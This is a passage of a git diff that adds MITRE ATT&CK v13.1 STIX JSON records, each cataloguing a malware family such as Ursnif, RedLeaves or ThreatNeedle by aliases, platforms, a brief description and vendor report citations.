"x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json new file mode 100644 index 0000000000000000000000000000000000000000..05206b3a1202a7dc1e152a708378d562dc238716 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--b4813f35-c607-4938-ba40-d0913a81101b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Emissary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1", + "type": "malware", + "created": "2017-05-31T21:32:54.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0082", + "external_id": "S0082" + }, + { + "source_name": "Emissary", + "description": "(Citation: Lotus Blossom Dec 2015)" + }, + { + "source_name": "Lotus Blossom Dec 2015", + "description": "Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + } + ], + "modified": "2021-08-09T14:21:48.477Z", + "name": "Emissary", + "description": "[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json new file mode 100644 index 0000000000000000000000000000000000000000..0c7c5c6a1334b74f17c717f192ca4c6f5490bacd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c542e422-fb91-4a9c-b96b-d24b817b4fe7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Exaramel for Linux" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd", + "type": "malware", + "created": "2019-08-26T13:02:46.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0401", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0401" + }, + { + "source_name": "Exaramel for Linux", + "description": "(Citation: ESET TeleBots Oct 2018)" + }, + { + "source_name": "ESET TeleBots Oct 2018", + "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018." + } + ], + "modified": "2021-04-14T22:43:50.451Z", + "name": "Exaramel for Linux", + "description": "[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json new file mode 100644 index 0000000000000000000000000000000000000000..60d25d19f9579d96791774aeeb873cde4d037f8e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--d1ab8cd7-940a-43b1-8d28-ac71dad01bfb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BUBBLEWRAP", + "Backdoor.APT.FakeWinHTTPHelper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b", + "type": "malware", + "created": "2017-05-31T21:32:33.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0043", + "external_id": "S0043" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "modified": "2020-03-30T15:03:26.307Z", + "name": "BUBBLEWRAP", + "description": "[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json new file mode 100644 index 0000000000000000000000000000000000000000..9671b67ef6c90bb0d2955ad50cf6fc165c9fed52 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--6c25450c-28d6-4fe4-8d4b-81a465ae92c5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HAWKBALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--12a7450d-b03e-4990-a5b8-b405ab9c803b", + "type": "malware", + "created": "2019-06-20T14:52:45.057Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0391", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0391" + }, + { + "source_name": "HAWKBALL", + "description": "(Citation: FireEye HAWKBALL Jun 2019)" + }, + { + "description": "Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", + "source_name": "FireEye HAWKBALL Jun 2019" + } + ], + "modified": "2020-03-30T16:46:39.617Z", + "name": "HAWKBALL", + "description": "[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json new file mode 100644 index 0000000000000000000000000000000000000000..c2ed382c74d3779c7fe64548c3762eaac92671cd --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--fde7622b-d628-4cf5-928c-9a831bd096a8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T16:04:51.193Z", + "name": "PS1", + "description": "[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "PS1" + ], + "type": "malware", + "id": "malware--13183cdf-280b-46be-913a-5c6df47831e7", + "created": "2021-05-24T14:55:59.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0613", + "external_id": "S0613" + }, + { + "source_name": "BlackBerry CostaRicto November 2020", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json new file mode 100644 index 0000000000000000000000000000000000000000..5a50ff6f85fcda624a54e7e37b7ea722100dc687 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json 
@@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--c77e8035-6ca8-451e-94ae-496198e6e7a5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:42:32.541Z", + "name": "Ursnif", + "description": "[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "Ursnif", + "Gozi-ISFB", + "PE_URSNIF", + "Dreambot" + ], + "type": "malware", + "id": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407", + "created": "2019-06-04T18:42:22.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0386", + "external_id": "S0386" + }, + { + "source_name": "Gozi-ISFB", + "description": "(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)" + }, + { + "source_name": "Ursnif", + "description": "(Citation: NJCCIC Ursnif Sept 2016)" + }, + { + "source_name": "Dreambot", + "description": "(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)" + }, + { + "source_name": "PE_URSNIF", + "description": "(Citation: TrendMicro Ursnif Mar 2015)" + }, + { + "source_name": "TrendMicro Ursnif Mar 2015", + "description": "Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. 
Retrieved June 5, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992" + }, + { + "source_name": "NJCCIC Ursnif Sept 2016", + "description": "NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif" + }, + { + "source_name": "ProofPoint Ursnif Aug 2016", + "description": "Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + }, + { + "source_name": "FireEye Ursnif Nov 2017", + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json new file mode 100644 index 0000000000000000000000000000000000000000..fecd19e1f33e1e2de5bfc020cd4e329abf4bd384 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--48d71235-3262-4c60-bc83-df921a9d0ca2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T20:18:23.760Z", + "name": "ThreatNeedle", + "description": "[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "ThreatNeedle" + ], + "type": "malware", + "id": "malware--16040b1c-ed28-4850-9d8f-bb8b81c42092", + "created": "2021-11-30T15:46:36.159Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0665", + "external_id": "S0665" + }, + { + "source_name": "Kaspersky ThreatNeedle Feb 2021", + "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.", + "url": "https://securelist.com/lazarus-threatneedle/100803/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json new file mode 100644 index 0000000000000000000000000000000000000000..208667aa89d19ab5b157dd2fa43ccb1a0204a3c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e1fe3165-a539-4fec-861a-39017a4add12", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T20:52:00.462Z", + "name": "ZLib", + "description": "[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "ZLib" + ], + "type": "malware", + "id": "malware--166c0eca-02fd-424a-92c0-6b5106994d31", + "created": "2017-05-31T21:32:56.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0086", + "external_id": "S0086" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json new file mode 100644 index 0000000000000000000000000000000000000000..772252f91e09631cd40e0a9b6bc7929b03891647 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json 
@@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--4cad74f2-6147-43a6-947f-0f2064b8cf0f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-23T15:14:18.594Z", + "name": "RedLeaves", + "description": "[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "RedLeaves", + "BUGJUICE" + ], + "type": "malware", + "id": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0153", + "external_id": "S0153" + }, + { + "source_name": "RedLeaves", + "description": "(Citation: PWC Cloud Hopper Technical Annex April 2017)" + }, + { + "source_name": "BUGJUICE", + "description": "Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. (Citation: FireEye APT10 April 2017) (Citation: Twitter Nick Carr APT10)" + }, + { + "source_name": "Twitter Nick Carr APT10", + "description": "Carr, N.. (2017, April 6). Retrieved June 29, 2017.", + "url": "https://twitter.com/ItsReallyNick/status/850105140589633536" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). 
APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + }, + { + "source_name": "PWC Cloud Hopper Technical Annex April 2017", + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.", + "url": "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json new file mode 100644 index 0000000000000000000000000000000000000000..764a945ae66df3c17f253fee84728440679f9a24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234.json 
@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--b445a2e8-fe92-4b2a-8170-b885b370bfdb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234", + "type": "malware", + "created": "2017-05-31T21:33:16.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0133", + "external_id": "S0133" + }, + { + "source_name": "Softpedia MinerC", + "description": "Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.", + "url": "http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Miner-C", + "description": "[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json new file mode 100644 index 0000000000000000000000000000000000000000..9ecb0cca1a44a2fc3b446d453aa7254f13154565 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17e919aa-4a49-445c-b103-dbb8df9e7351.json 
@@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--bdb0703f-8ba6-4be5-91f6-0612837e6013", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "POWERSOURCE", + "DNSMessenger" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--17e919aa-4a49-445c-b103-dbb8df9e7351", + "created": "2017-05-31T21:33:24.739Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0145", + "url": "https://attack.mitre.org/software/S0145" + }, + { + "source_name": "POWERSOURCE", + "description": "(Citation: FireEye FIN7 March 2017)" + }, + { + "source_name": "DNSMessenger", + "description": "Based on similar descriptions of functionality, it appears S0145, as named by FireEye, is the same as the first stages of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. (Citation: Cisco DNSMessenger March 2017) (Citation: FireEye FIN7 March 2017)" + }, + { + "source_name": "Cisco DNSMessenger March 2017", + "url": "http://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "description": "Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017." + }, + { + "source_name": "FireEye FIN7 March 2017", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)", + "modified": "2022-07-20T20:06:44.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "POWERSOURCE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json new file mode 100644 index 0000000000000000000000000000000000000000..9751aba1aa094e437ea370ed571efe78b1064b45 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--8030007e-0d54-45aa-a7f8-c670c44a3859", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Felismus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0171", + "external_id": "S0171" + }, + { + "source_name": "Felismus", + "description": "(Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)" + }, + { + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "source_name": "Symantec Sowbug Nov 2017" + }, + { + "url": "https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware", + "description": "Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.", + "source_name": "Forcepoint Felismus Mar 2017" + } + ], + "modified": "2020-03-30T18:52:30.568Z", + "name": "Felismus", + "description": "[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). 
